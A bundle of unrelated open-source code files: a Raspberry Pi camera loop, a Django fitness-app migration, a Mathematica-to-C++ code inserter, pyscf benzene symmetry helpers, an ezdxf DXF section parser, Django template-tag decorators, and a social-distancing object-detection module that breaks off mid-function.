print('Exception while calling copy_to')
print(str(e))
break
stream.clear()
try:
camera.split_recording(stream)
except picamera.PiCameraError as e:
print('Exception while calling split_recording (2)')
print(str(e))
break
except Exception as e:
print('Non PiCamera exception while calling split_recording (2)')
print(str(e))
break
heartbeat.done()
temperature.done()
streamer.done()
# TODO: find the proper way to wait for threads to terminate
time.sleep(3)
camera.stop_recording()
|
# Generated by Django 3.0.4 on 2020-03-24 11:15
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
]
operations = [
migrations.CreateModel(
name='CustomAdmin',
fields=[
('auth_user',
models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False,
to=settings.AUTH_USER_MODEL)),
('hospital', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='CustomUser',
fields=[
('auth_user',
models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False,
to=settings.AUTH_USER_MODEL)),
('phone_number', models.CharField(blank=True, max_length=20, null=True)),
('photo', models.TextField(blank=True, null=True)),
('birth_date', models.DateField()),
],
),
migrations.CreateModel(
name='Exercise',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('target_body_area', models.CharField(max_length=25)),
('difficulty', models.IntegerField()),
],
),
migrations.CreateModel(
name='Ingredient',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('calories', models.FloatField()),
('proteins', models.FloatField()),
('fat', models.FloatField()),
('carbs', models.FloatField()),
('name', models.CharField(max_length=30)),
],
),
migrations.CreateModel(
name='Meal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
('category', models.CharField(max_length=30)),
],
),
migrations.CreateModel(
name='Set',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('number_of_reps', models.IntegerField()),
('time', models.FloatField()),
('exercise', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL,
to='rest_api.Exercise')),
],
),
migrations.CreateModel(
name='Client',
fields=[
('user',
models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False,
to='rest_api.CustomUser')),
('height', models.FloatField()),
('current_weight', models.FloatField()),
('weight_goal', models.FloatField()),
],
),
migrations.CreateModel(
name='Doctor',
fields=[
('user',
models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False,
to='rest_api.CustomUser')),
('hospital', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Quantity',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.FloatField()),
(
'ingredient',
models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='rest_api.Ingredient')),
('meal', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='rest_api.Meal')),
],
),
migrations.AddField(
model_name='meal',
name='ingredients',
field=models.ManyToManyField(through='rest_api.Quantity', to='rest_api.Ingredient'),
),
migrations.CreateModel(
name='Workout',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('rest_time', models.DurationField()),
('difficulty', models.IntegerField()),
('workout_sets', models.ManyToManyField(to='rest_api.Set')),
('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='rest_api.Client')),
],
),
migrations.CreateModel(
name='MealHistory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('day', models.DateField()),
('type_of_meal', models.CharField(max_length=25)),
('number_of_servings', models.FloatField()),
('meal', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='rest_api.Meal')),
('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='rest_api.Client')),
],
),
migrations.AddField(
model_name='meal',
name='client',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
to='rest_api.Client'),
),
migrations.AddField(
model_name='client',
name='doctor',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL,
to='rest_api.Doctor'),
),
]
|
#!/usr/bin/env python3
import os,re,sys, traceback
# read files of Mathematica equation exports
# change variable names to corresponding things in C
# insert things in the corresponding C file
class Inserter:
# the file used in C
filename_cpp = "numsolve.cpp"
paramstruct_name = "paramstruct"
# specify the filenames containing the exports
# from Mathematica
filename_precur = "patchrecurs.txt" # patch frequency recursions
filename_repval = "repvals.txt" # the recursions of the reproductive values
filename_related = "relatedness.txt" # the relatedness coefficients
filename_selgrads = "selgrad.txt" # the selection gradients
filename_vars= "variables.txt" # a file containing all the variables used
filename_params = "params.txt" # a file containing all the variables used
# a list of regular expressions to transform Mathematica-expressions
# to their C equivalents
relist = ["r([am]{2,2})tplus1\((\d),(\d)\)","r([am]{2,2})\((\d),(\d)\)", "s\((\d)\)", "f\((\d),(\d)\)", "ftplus1\((\d),(\d)\)", "v\((\d),(a|m),(\d)\)", "vtplus1\((\d),(a|m),(\d)\)", "Power", "sqrt", "ϵ"]
sollist = ["r\\1tplus1\\2\\3", "r\\1\\2\\3", "s\\1", "f\\1\\2", "ftplus1\\1\\2", "v\\1\\2\\3","vtplus1\\1\\2\\3", "pow", "sqrt","epsilon"];
# replaces all the Mathematica variables in the file filename
# with their C equivalents according to the regexps above
def transform(self, filename):
# read in the file as a single string
thefile = open(filename)
contents = thefile.read()
thefile.close()
# replace all occurrence of any of the patterns above
for i in range(0, len(self.relist)):
contents = re.sub(re.compile(self.relist[i]),self.sollist[i],contents)
# return file contents
return(contents)
# function that inserts variable definitions at the required
# places
def insert_variables(self, strvars, strfile):
# generate variable definition according to
#double x = ((struct rparams *) params)->x;
vardeffunc = re.sub("double\s(.*);","double \\1 = ((struct rparams *) params)->\\1;",strvars)
strfile = re.sub("VARS","\n" + strvars,strfile)
strfile = re.sub("VARFUNC","\n" + vardeffunc,strfile)
return(strfile)
# initialize the array of argc(x)
# values at the start of the main() function
# dependent on all the variables provided in vars(x)
def initargument(self, strvars, strfile):
strvars_split = strvars.split("\n")
initstruct = ""
for i in range(0, len(strvars_split)):
initstruct += re.sub("double\s(.*);","\t\t" + self.paramstruct_name + ".\\1 = atof(argv[" + str(i + 2) + "]);\n",strvars_split[i].strip())
strfile = re.sub("ARGINIT","\n" + initstruct, strfile)
return(strfile)
# generate the contents of the write params function
# arguments: strvars - \n-separated string with all the variables
# strfile:
def make_write_params_function(self, strparams, strfile):
# split the string of params
strparams_split = strparams.split("\n")
filling = "DataFile << endl << endl "
for param in strparams_split:
if param == "":
continue
param_s = re.sub("double\s(.*);","\\1", param)
# get all the parameters into a string with C++ code
filling += " << \"" + param_s + ";\" << " + param_s + " << endl\n"
filling += " << endl;"
strfile = re.sub("WRITEPARAMS","\n" + filling, strfile)
return(strfile)
# generate the contents of the write data function
# strvars: string with all the variables, still with types (i.e., double...)
# strparams: a string with all the parameters, still with types (i.e., double...)
# strfile: the file to write it to
def make_write_data_function(self, strvars, strparams, strfile):
# split all the variables according to line
strvars_split = strvars.split("\n")
# split all the parameters according to the line
strparams_split = strparams.split("\n")
# get those variables that are not parameters
strvars_split = list(set(strvars_split) - set(strparams_split))
# get all the variables in a string with C++ code
function_filling = "DataFile << time << \";\" << "
data_headers = "DataFile << \"time;"
for var in strvars_split:
if var == "":
continue
var_clean = re.sub("double\s(.*);","\\1", var) # strip the double before the variable declaration
var_clean = var_clean.strip()
function_filling += var_clean + " << \";\" << \n"
data_headers += var_clean + ";"
function_filling += " endl;"
data_headers += "\" << endl;"
strfile = re.sub("HEADERWRT","\n" + data_headers, strfile)
strfile = re.sub("WRITEDATA","\n" + function_filling, strfile)
return(strfile)
# to calculate the eigenvalue, we need to specify the matrix
# and then use gsl_eigen_nonsymmv
# however we need to prepare this, which is done in this function
def insert_matrix(self, dimension, strfile):
strmat = "double data[] = {";
for i in range(1,dimension+1):
for j in range(1,dimension+1):
strmat += "a" + str(i) + "_" + str(j) + ",\n";
# cut off the trailing ",\n" that we needed in the for-loops
strmat = strmat[0:-2]
# add a closing curly bracket
strmat += "};\n\n"
# replace it where necessary in the file
strfile = re.sub("MATSPECIFY","\n" + strmat, strfile)
return(strfile)
def __init__(self):
# transform all the files
str_precur = self.transform(self.filename_precur)
str_repval = self.transform(self.filename_repval)
str_related = self.transform(self.filename_related)
str_selgrads = self.transform(self.filename_selgrads)
str_vars = self.transform(self.filename_vars)
str_params = self.transform(self.filename_params)
# open the c++ file
cpp_f = open(self.filename_cpp)
cpp_f_str = cpp_f.read()
# put the contents of each of the Mathematica
# file at their respective positions indicated in the c++ file
cpp_f_str = re.sub("PATCHRECUR","\n" + str_precur,cpp_f_str)
# cpp_f_str = re.sub("EVMAT","\n" + str_ev,cpp_f_str)
cpp_f_str = re.sub("REPVALRECUR","\n" + str_repval,cpp_f_str)
cpp_f_str = re.sub("RELRECUR","\n" + str_related,cpp_f_str)
cpp_f_str = re.sub("SELGRADS","\n" + str_selgrads,cpp_f_str)
# insert variable definitions
cpp_f_str = self.insert_variables(str_vars, cpp_f_str)
# insert matrix definition eigenvalue function
# cpp_f_str = self.insert_matrix(4, cpp_f_str)
cpp_f_str = self.initargument(str_vars, cpp_f_str)
cpp_f_str = self.make_write_data_function(str_vars,str_params, cpp_f_str)
cpp_f_str = self.make_write_params_function(str_params, cpp_f_str)
print(cpp_f_str)
a = Inserter()
|
<gh_stars>1-10
import numpy as np
from scipy.spatial.transform import Rotation as R
from pyscf.symm.basis import _ao_rotation_matrices as aorm
#symmetry operations on bezene
def old_rotate_matrix(M,mol,atm_idx): # to rotate the idx of the carbon atoms
pt=mol.aoslice_by_atom()[atm_idx,-2]
Mr=np.zeros_like(M)
Mr[:-pt,:-pt]=M[pt:,pt:]
Mr[-pt:,-pt:]=M[:pt,:pt]
Mr[:-pt,-pt:]=M[pt:,:pt]
Mr[-pt:,:-pt]=M[:pt,pt:]
return Mr
def rotate_matrix(M,mol,atm_idx,ref_site=0): # to rotate the idx of the carbon atoms
pt=mol.aoslice_by_atom()[atm_idx,-2]
rpt=mol.aoslice_by_atom()[ref_site,-2]
Mr=np.zeros_like(M)
msize=M.shape[0]
for i in range(msize):
for j in range(msize):
Mr[i,j]=M[(i+rpt-pt)%msize,(j+rpt-pt)%msize]
return Mr
def rotate_grad(g,atm_idx,ref_site=0):
gr=np.zeros_like(g)
glen=g.shape[0]
for i in range(glen):
gr[i]=g[(i+ref_site-atm_idx)%glen]
return gr
class benz_Symm:
def __init__(self,mol):
self.mol=mol
#for our particular benzene molecule
self.axis=np.array((0,0,1))
self.irrepr=[0,1]
self.eqs={}
for eq in range(2,12):
self.eqs[eq]={'ref':eq%2,'op':R.from_rotvec(-self.axis*np.pi/3*(eq//2))}
def symm_gradient(self,afr,atm_idx,ref_idx):
return rotate_grad(self.eqs[atm_idx]['op'].apply(afr),atm_idx,ref_site=ref_idx)
def rotate_mo1e1(self,mo1,e1,site,ref_idx,C,S):
nocc=self.mol.nelec[0]
rm=self.make_RM(site,ref_idx)
mo1r=(C.T@S@rotate_matrix(rm.T@(C@mo1@C.T[:nocc,:])@rm,self.mol,site,ref_site=ref_idx)@S@C)[:,:nocc]
e1r=(C.T@S@rotate_matrix(rm.T@(C[:,:nocc]@e1@C.T[:nocc,:])@rm,self.mol,site,ref_site=ref_idx)@S@C)[:nocc,:nocc]
return (mo1r,e1r)
def make_RM(self,site,ref_idx):
p_idxs=[i for i,elem in enumerate(self.mol.ao_labels()) if "px" in elem]
d_idxs=[i for i,elem in enumerate(self.mol.ao_labels()) if "dxy" in elem]
f_idxs=[i for i,elem in enumerate(self.mol.ao_labels()) if "fy^3" in elem]
rm_p= self.eqs[site]['op'].as_dcm()
Dm_ao=aorm(self.mol,rm_p)
rm=np.eye(self.mol.nao)
for i in p_idxs:
rm[i:i+3,i:i+3]=Dm_ao[1]
for i in d_idxs:
rm[i:i+5,i:i+5]=Dm_ao[2]
for i in f_idxs:
rm[i:i+7,i:i+7]=Dm_ao[3]
return rm
# for methane stuff
def rothess(h):
hr=np.zeros_like(h)
ridx={0:0,1:1,2:3,3:4,4:2}
for i in range(5):
for j in range(5):
hr[i,j]=r.apply(r.apply(h[ridx[i],ridx[j]]).T).T
return hr
def rotgrad(g):
b=r.apply(g)
b[[2,3,4]]=b[[3,4,2]]
return b
|
<reponame>tapnair/DXFer
# Purpose: acdsdata section manager
# Created: 05.05.2014
# Copyright (C) 2014, <NAME>
# License: MIT License
"""
ACDSDATA entities have NO handles, therefor they can not be stored in the drawing entity database.
every routine written until now (2014-05-05), expects entities with valid handle - fuck you autodesk
section structure (work in progress):
0 <str> SECTION
2 <str> ACDSDATA
70 <int> 2 # flag?
71 <int> 6 # count of following ACDSSCHEMA entities ??? no, just another flag
0 <str> ACDSSCHEMA # dxftype: schema definition
90 <int> 0 # schema number 0, 1, 2, 3 ...
1 <str> AcDb3DSolid_ASM_Data # schema name
2 <str> AcDbDs::ID # subsection name
280 <int> 10 # subsection type 10 = ???
91 <int> 8 # data ???
2 <str> ASM_Data # subsection name
280 <int> 15 # subsection type
91 <int> 0 # data ???
101 <str> ACDSRECORD # data
95 <int> 0
90 <int> 2
...
0 <str> ACDSSCHEMA
90 <int> 1
1 <str> AcDb_Thumbnail_Schema
...
0 <str> ACDSSCHEMA
90 <int> 2
1 <str> AcDbDs::TreatedAsObjectDataSchema
...
0 <str> ACDSSCHEMA
90 <int> 3
1 <str> AcDbDs::LegacySchema
2 <str> AcDbDs::Legacy
280 <int> 1
91 <int> 0
0 <str> ACDSSCHEMA
90 <int> 4
1 <str> AcDbDs::IndexedPropertySchema
2 <str> AcDs:Indexable
280 <int> 1
91 <int> 0
0 <str> ACDSSCHEMA
90 <int> 5
1 <str> AcDbDs::HandleAttributeSchema
2 <str> AcDbDs::HandleAttribute
280 <int> 7
91 <int> 1
284 <int> 1
0 <str> ACDSRECORD # dxftype: data record
90 <int> 0 # ??? flag
2 <str> AcDbDs::ID # subsection name
280 <int> 10 # subsection type 10 = handle to owner entity, 3DSOLID???
320 <str> 339 # handle
2 <str> ASM_Data # subsection name
280 <int> 15 # subsection type 15 = binary data
94 <int> 1088 # size of data
310 <binary encoded data> # data
310 <binary encoded data> # data
...
0 <str> ENDSEC
"""
from __future__ import unicode_literals
__author__ = "mozman <<EMAIL>>"
from itertools import islice
from ..lldxf.tags import TagGroups, DXFStructureError, write_tags, Tags
class AcDsDataSection(object):
name = 'acdsdata'
def __init__(self, tags, drawing):
self.entities = [] # stores AcDsData objects
self.section_info = []
self.drawing = drawing
if tags is not None:
self._build(tags)
@property
def dxffactory(self):
return self.drawing.dxffactory
@property
def entitydb(self):
return self.drawing.entitydb
def _build(self, tags):
if tags[0] != (0, 'SECTION') or tags[1] != (2, self.name.upper()) or tags[-1] != (0, 'ENDSEC'):
raise DXFStructureError("Critical structure error in {} section.".format(self.name.upper()))
if len(tags) == 3: # empty entities section
return
start_index = 2
while tags[start_index].code != 0:
self.section_info.append(tags[start_index])
start_index += 1
for group in TagGroups(islice(tags, start_index, len(tags)-1)):
self._append_entity(AcDsData(Tags(group))) # tags have no subclasses
def _append_entity(self, entity):
cls = ACDSDATA_TYPES.get(entity.dxftype())
if cls is not None:
entity = cls(entity.tags)
self.entities.append(entity)
def write(self, stream):
stream.write(" 0\nSECTION\n 2\n%s\n" % self.name.upper())
write_tags(stream, self.section_info)
for entity in self.entities:
entity.write(stream)
stream.write(" 0\nENDSEC\n")
class AcDsData(object):
def __init__(self, tags):
self.tags = tags
def write(self, stream):
write_tags(stream, self.tags)
def dxftype(self):
return self.tags[0].value
class Section(Tags):
@property
def name(self):
return self[0].value
@property
def type(self):
return self[1].value
@property
def data(self):
return self[2:]
class AcDsRecord(object):
def __init__(self, tags):
self._dxftype = tags[0]
self.flags = tags[1]
self.sections = [Section(tags) for tags in TagGroups(islice(tags, 2, None), splitcode=2)]
def dxftype(self):
return self._dxftype.value
def has_section(self, name):
return self.get_section(name, default=None) is not None
def get_section(self, name, default=KeyError):
for section in self.sections:
if section.name == name:
return section
if default is KeyError:
raise KeyError(name)
else:
return default
def __getitem__(self, name):
return self.get_section(name)
def _write_header(self, stream):
write_tags(stream, Tags([self._dxftype, self.flags]))
def write(self, stream):
self._write_header(stream)
for section in self.sections:
write_tags(stream, section)
ACDSDATA_TYPES = {
'ACDSRECORD': AcDsRecord,
} |
# I got this from http://svn.navi.cx/misc/trunk/djblets/djblets/util/decorators.py (sbf)
# It should make useful template tag creation much less tedious and annoying when
# needing any complex functionality such as access to the context or a block
# This is part of the djiblets template library.
#
# decorators.py -- Miscellaneous, useful decorators. This might end up moving
# to something with a different name.
#
# Copyright (c) 2007 <NAME>
# Copyright (c) 2007 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from inspect import getargspec
from django import template
from django.template import TemplateSyntaxError, Variable
# The decorator decorator. This is copyright unknown, verbatim from
# http://wiki.python.org/moin/PythonDecoratorLibrary
def simple_decorator(decorator):
"""This decorator can be used to turn simple functions
into well-behaved decorators, so long as the decorators
are fairly simple. If a decorator expects a function and
returns a function (no descriptors), and if it doesn't
modify function attributes or docstring, then it is
eligible to use this. Simply apply @simple_decorator to
your decorator and it will automatically preserve the
docstring and function attributes of functions to which
it is applied."""
def new_decorator(f):
g = decorator(f)
g.__name__ = f.__name__
g.__doc__ = f.__doc__
g.__dict__.update(f.__dict__)
return g
# Now a few lines needed to make simple_decorator itself
# be a well-behaved decorator.
new_decorator.__name__ = decorator.__name__
new_decorator.__doc__ = decorator.__doc__
new_decorator.__dict__.update(decorator.__dict__)
return new_decorator
def basictag(takes_context=False):
"""
A decorator similar to Django's @register.simple_tag that optionally
takes a context parameter. This condenses many tag implementations down
to a few lines of code.
Example:
@register.tag
@basictag(takes_context=True)
def printuser(context):
return context['user']
"""
class BasicTagNode(template.Node):
def __init__(self, take_context, tag_name, tag_func, args):
self.takes_context = takes_context
self.tag_name = tag_name
self.tag_func = tag_func
self.args = args
def render(self, context):
args = [Variable(var).resolve(context) for var in self.args]
if self.takes_context:
return self.tag_func(context, *args)
else:
return self.tag_func(*args)
def basictag_func(tag_func):
def _setup_tag(parser, token):
bits = token.split_contents()
tag_name = bits[0]
del bits[0]
params, xx, xxx, defaults = getargspec(tag_func)
max_args = len(params)
if takes_context:
if params[0] == 'context':
max_args -= 1 # Ignore context
else:
raise TemplateSyntaxError, "Any tag function decorated with takes_context=True " "must have a first argument of 'context'"
min_args = max_args - len(defaults or [])
if not min_args <= len(bits) <= max_args:
if min_args == max_args:
raise TemplateSyntaxError, "%r tag takes %d arguments." % (
tag_name,
min_args,
)
else:
raise TemplateSyntaxError, "%r tag takes %d to %d arguments, got %d." % (
tag_name,
min_args,
max_args,
len(bits),
)
return BasicTagNode(takes_context, tag_name, tag_func, bits)
_setup_tag.__name__ = tag_func.__name__
_setup_tag.__doc__ = tag_func.__doc__
_setup_tag.__dict__.update(tag_func.__dict__)
return _setup_tag
return basictag_func
def blocktag(tag_func):
"""
A decorator similar to Django's @register.simple_tag that does all the
redundant work of parsing arguments and creating a node class in order
to render content between a foo and endfoo tag block. This condenses
many tag implementations down to a few lines of code.
Example:
@register.tag
@blocktag
def divify(context, nodelist, div_id=None):
s = "<div"
if div_id:
s += " id='%s'" % div_id
return s + ">" + nodelist.render(context) + "</div>"
"""
class BlockTagNode(template.Node):
def __init__(self, tag_name, tag_func, nodelist, args):
self.tag_name = tag_name
self.tag_func = tag_func
self.nodelist = nodelist
self.args = args
def render(self, context):
args = [Variable(var).resolve(context) for var in self.args]
return self.tag_func(context, self.nodelist, *args)
def _setup_tag(parser, token):
bits = token.split_contents()
tag_name = bits[0]
del bits[0]
params, xx, xxx, defaults = getargspec(tag_func)
max_args = len(params) - 2 # Ignore context and nodelist
min_args = max_args - len(defaults or [])
if not min_args <= len(bits) <= max_args:
if min_args == max_args:
raise TemplateSyntaxError, "%r tag takes %d arguments." % (
tag_name,
min_args,
)
else:
raise TemplateSyntaxError, "%r tag takes %d to %d arguments, got %d." % (
tag_name,
min_args,
max_args,
len(bits),
)
nodelist = parser.parse(('end%s' % tag_name),)
parser.delete_first_token()
return BlockTagNode(tag_name, tag_func, nodelist, bits)
_setup_tag.__name__ = tag_func.__name__
_setup_tag.__doc__ = tag_func.__doc__
_setup_tag.__dict__.update(tag_func.__dict__)
return _setup_tag
|
import time
import cv2 as cv
import numpy as np
import math
from libs.centroid_object_tracker import CentroidTracker
from scipy.spatial import distance as dist
from libs.loggers.loggers import Logger
class Distancing:
def __init__(self, config):
self.config = config
self.ui = None
self.detector = None
self.device = self.config.get_section_dict('Detector')['Device']
self.running_video = False
self.tracker = CentroidTracker(
max_disappeared=int(self.config.get_section_dict("PostProcessor")["MaxTrackFrame"]))
self.logger = Logger(self.config)
if self.device == 'Jetson':
from libs.detectors.jetson.detector import Detector
self.detector = Detector(self.config)
elif self.device == 'EdgeTPU':
from libs.detectors.edgetpu.detector import Detector
self.detector = Detector(self.config)
elif self.device == 'Dummy':
self.detector = None
elif self.device == 'x86':
from libs.detectors.x86.detector import Detector
self.detector = Detector(self.config)
self.image_size = [int(i) for i in self.config.get_section_dict('Detector')['ImageSize'].split(',')]
if self.device != 'Dummy':
print('Device is: ', self.device)
print('Detector is: ', self.detector.name)
print('image size: ', self.image_size)
self.dist_method = self.config.get_section_dict("PostProcessor")["DistMethod"]
self.dist_threshold = self.config.get_section_dict("PostProcessor")["DistThreshold"]
def set_ui(self, ui):
self.ui = ui
def __process(self, cv_image):
"""
return object_list list of dict for each obj,
obj["bbox"] is normalized coordinations for [x0, y0, x1, y1] of box
"""
if self.device == 'Dummy':
return cv_image, [], None
# Resize input image to resolution
resolution = [int(i) for i in self.config.get_section_dict('App')['Resolution'].split(',')]
cv_image = cv.resize(cv_image, tuple(resolution))
resized_image = cv.resize(cv_image, tuple(self.image_size[:2]))
rgb_resized_image = cv.cvtColor(resized_image, cv.COLOR_BGR2RGB)
tmp_objects_list = self.detector.inference(rgb_resized_image)
[w,h] = resolution
for obj in tmp_objects_list:
box = obj["bbox"]
x0 = box[1]
y0 = box[0]
x1 = box[3]
y1 = box[2]
obj["centroid"] = [(x0 + x1) / 2, (y0 + y1) / 2, x1 - x0, y1 - y0]
obj["bbox"] = [x0, y0, x1, y1]
obj["centroidReal"]=[(x0 + x1)*w / 2, (y0 + y1)*h / 2, (x1 - x0)*w, (y1 - y0)*h]
obj["bboxReal"]=[x0*w,y0*h,x1*w,y1*h]
objects_list, distancings = self.calculate_distancing(tmp_objects_list)
return cv_image, objects_list, distancings
def process_video(self, video_uri):
input_cap = cv.VideoCapture(video_uri)
if (input_cap.isOpened()):
print('opened video ', video_uri)
else:
print('failed to load video ', video_uri)
return
self.running_video = True
while input_cap.isOpened() and self.running_video:
_, cv_image = input_cap.read()
if np.shape(cv_image) != ():
cv_image, objects, distancings = self.__process(cv_image)
else:
continue
self.logger.update(objects, distancings)
self.ui.update(cv_image, objects, distancings)
input_cap.release()
self.running_video = False
def process_image(self, image_path):
# Process and pass the image to ui modules
cv_image = cv.imread(image_path)
cv_image, objects, distancings = self.__process(cv_image)
self.ui.update(cv_image, objects, distancings)
def calculate_distancing(self, objects_list):
"""
this function post-process the raw boxes of object detector and calculate a distance matrix
for detected bounding boxes.
post processing is consist of:
1. omitting large boxes by filtering boxes which are biger than the 1/4 of the size the image.
2. omitting duplicated boxes by applying an auxilary non-maximum-suppression.
3. apply a simple object tracker to make the detection more robust.
params:
object_list: a list of dictionaries. each dictionary has attributes of a detected object such as
"id", "centroid" (a tuple of the normalized centroid coordinates (cx,cy,w,h) of the box) and "bbox" (a tuple
of the normalized (xmin,ymin,xmax,ymax) coordinate of the box)
returns:
object_list: the post processed version of the input
distances: a NxN ndarray which i,j element is distance between i-th and l-th bounding box
"""
new_objects_list = self.ignore_large_boxes(objects_list)
new_objects_list = self.non_max_suppression_fast(new_objects_list,
float(self.config.get_section_dict("PostProcessor")[
"NMSThreshold"]))
tracked_boxes = self.tracker.update(new_objects_list)
new_objects_list = [tracked_boxes[i] for i in tracked_boxes.keys()]
for i, item in enumerate(new_objects_list):
item["id"] = item["id"].split("-")[0] + "-" + str(i)
centroids = np.array( [obj["centroid"] for obj in new_objects_list] )
distances = self.calculate_box_distances(new_objects_list)
return new_objects_list, distances
@staticmethod
def ignore_large_boxes(object_list):
"""
filtering boxes which are biger than the 1/4 of the size the image
params:
object_list: a list of dictionaries. each dictionary has attributes of a detected object such as
"id", "centroid" (a tuple of the normalized centroid coordinates (cx,cy,w,h) of the box) and "bbox" (a tuple
of the normalized (xmin,ymin,xmax,ymax) coordinate of the box)
returns:
object_list: input object list without large boxes
"""
large_boxes = []
for i in range(len(object_list)):
if (object_list[i]["centroid"][2] * object_list[i]["centroid"][3]) > 0.25:
large_boxes.append(i)
updated_object_list = [j for i, j in enumerate(object_list) if i not in large_boxes]
return updated_object_list
@staticmethod
def non_max_suppression_fast(object_list, overlapThresh):
"""
omitting duplicated boxes by applying an auxilary non-maximum-suppression.
params:
object_list: a list of dictionaries. each dictionary has attributes of a detected object such
"id", "centroid" (a tuple of the normalized centroid coordinates (cx,cy,w,h) of the box) and "bbox" (a tuple
of the normalized (xmin,ymin,xmax,ymax) coordinate of the box)
overlapThresh: threshold of minimum IoU of to detect two box as duplicated.
returns:
object_list: input object list without duplicated boxes
"""
# if there are no boxes, return an empty list
boxes = np.array([item["centroid"] for item in object_list])
corners = np.array([item["bbox"] for item in object_list])
if len(boxes) == 0:
return []
if boxes.dtype.kind == "i":
boxes = boxes.astype("float")
# initialize the list of picked indexes
pick = []
cy = boxes[:, 1]
cx = boxes[:, 0]
h = boxes[:, 3]
w = boxes[:, 2]
x1 = corners[:, 0]
x2 = corners[:, 2]
y1 = corners[:, 1]
y2 = corners[:, 3]
area = (h + 1) * (w + 1)
idxs = np.argsort(cy + (h / 2))
while len(idxs) > 0:
last = len(idxs) - 1
i = idxs[last]
pick.append(i)
xx1 = np.maximum(x1[i], x1[idxs[:last]])
yy1 = np.maximum(y1[i], y1[idxs[:last]])
xx2 = np.minimum(x2[i], x2[idxs[:last]])
yy2 = np.minimum(y2[i], y2[idxs[:last]])
w = np.maximum(0, xx2 - xx1 + 1)
h = np.maximum(0, yy2 - yy1 + 1)
# compute the ratio of overlap
overlap = (w * h) / area[idxs[:last]]
# delete all indexes from the index list that have
idxs = np.delete(idxs, np.concatenate(([last],
np.where(overlap > overlapThresh)[0])))
updated_object_list = [j for i, j in enumerate(object_list) if i in pick]
return updated_object_list
def calculate_distance_of_two_points_of_boxes(self,first_point, second_point):
"""
This function calculates a distance l for two input corresponding points of two detected bounding boxes.
it is assumed that each person is H = 170 cm tall in real scene to map the distances in the image (in pixels) to
physical distance measures (in meters).
params:
first_point: (x, y, h)-tuple, where x,y is the location of a point (center or each of 4 corners of a bounding box)
and h is the height of the bounding box.
second_point: same tuple as first_point for the corresponding point of other box
returns:
l: Estimated physical distance (in centimeters) between first_point and second_point.
"""
# estimate corresponding points distance
[xc1, yc1, h1] = first_point
[xc2, yc2, h2] = second_point
dx = xc2 - xc1
dy = yc2 - yc1
lx = dx * 170 * (1/h1 + 1/h2)/2
ly = dy * 170 * (1/h1 + 1/h2)/2
l=math.sqrt(lx**2+ly**2)
return l
def calculate_box_distances(self, nn_out):
"""
This function calculates a distance matrix for detected bounding boxes.
Two methods are implemented to calculate the distances, first one estimates distance of center points of the
boxes and second one uses minimum distance of each of 4 points of bounding boxes.
params:
object_list: a list of dictionaries. each dictionary has attributes of a detected object such as
"id", "centroidReal" (a tuple of the centroid coordinates (cx,cy,w,h) of the box) and "bboxReal" (a tuple
of the (xmin,ymin,xmax,ymax) coordinate of the box)
returns:
distances: a NxN ndarray which i,j element is estimated distance between i-th and j-th bounding box in real scene (cm)
"""
distances = []
for i in range(len(nn_out)):
distance_row=[]
for j in range(len(nn_out)):
if i == j:
l = 0
else:
if ( self.dist_method == 'FourCornerPointsDistance' ):
lower_left_of_first_box = [nn_out[i]["bboxReal"][0],nn_out[i]["bboxReal"][1],nn_out[i]["centroidReal"][3]]
lower_right_of_first_box = [nn_out[i]["bboxReal"][2],nn_out[i]["bboxReal"][1],nn_out[i]["centroidReal"][3]]
upper_left_of_first_box = [nn_out[i]["bboxReal"][0],nn_out[i]["bboxReal"][3],nn_out[i]["centroidReal"][3]]
upper_right_of_first_box = [nn_out[i]["bboxReal"][2],nn_out[i]["bboxReal"][3],nn_out[i]["centroidReal"][3]]
lower_left_of_second_box = [nn_out[j]["bboxReal"][0],nn_out[j]["bboxReal"][1],nn_out[j]["centroidReal"][3]]
